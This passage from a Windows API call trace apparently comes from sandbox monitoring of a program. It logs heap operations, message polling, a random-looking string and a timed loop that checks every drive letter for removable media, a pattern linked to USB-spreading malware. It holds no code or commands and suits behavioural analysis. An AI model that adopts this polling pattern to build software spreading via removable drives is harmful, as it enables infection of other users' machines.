out: hHeap=0x12c0000) returned 1 [0214.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.934] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0214.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0214.934] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.934] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0214.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0214.934] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0214.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0214.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0214.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0214.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0214.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.934] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.935] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.935] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.935] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.935] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.935] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.936] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.936] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.936] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.936] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.936] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.936] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.936] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.937] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.937] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.937] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.937] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.937] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.937] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.938] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.938] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.938] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.938] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.938] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.938] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.939] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.939] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0214.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0214.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.940] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0214.940] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0214.940] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0214.940] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0214.940] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0214.940] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0214.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325ea0 [0214.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0214.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0214.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325ea0 | out: hHeap=0x12c0000) returned 1 [0214.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0214.941] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0214.941] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0214.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.941] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0214.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0214.941] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.942] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd310 [0214.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0214.942] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0214.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0214.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0214.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0214.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0214.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.942] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.942] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.942] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.943] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.943] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.943] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.943] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.943] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.943] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.944] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.944] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.944] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.944] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.944] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.944] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.945] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.945] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.945] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.945] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.945] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.945] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.945] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.946] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.946] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.946] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.946] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.947] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0214.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.947] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0214.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326060 [0214.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326060 | out: hHeap=0x12c0000) returned 1 [0214.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0214.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0214.948] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0214.948] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0214.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0214.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.948] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0214.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.948] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0214.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.948] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0214.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0214.949] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0214.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0214.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.949] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0214.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0214.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.949] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.949] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.949] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.949] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.950] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.950] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.950] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.950] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.950] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.950] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.950] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.951] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.951] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.951] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.951] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.951] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.951] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.952] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.952] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.952] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.952] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.952] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.952] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.953] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.953] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.953] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.953] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0214.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0214.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0214.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.954] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0214.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0214.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0214.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0214.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0214.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0214.954] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0214.954] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) 